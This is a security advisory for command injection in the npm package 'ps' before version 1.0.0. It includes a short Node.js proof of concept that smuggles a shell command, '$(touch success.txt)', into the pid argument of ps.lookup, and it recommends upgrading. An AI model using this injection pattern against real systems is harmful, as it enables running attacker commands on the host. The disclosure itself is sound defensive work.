Command Injection

Overview

Versions of ps before 1.0.0 are vulnerable to command injection.

Proof of concept:

var ps = require('ps');

ps.lookup({ pid: "$(touch success.txt)" }, function(err, proc) { // this method is vulnerable to command injection
    if (err) {throw err;}
    if (proc) {
        console.log(proc);  // Process name, something like "node" or "bash"
    } else {
        console.log('No such process');
    }
});

// Result: The file success.txt will exist on the filesystem if the touch command was executed

Recommendation

Update to version 1.0.0 or later.

References

• HackerOne Report
• Node.js security-wg
• GitHub Advisory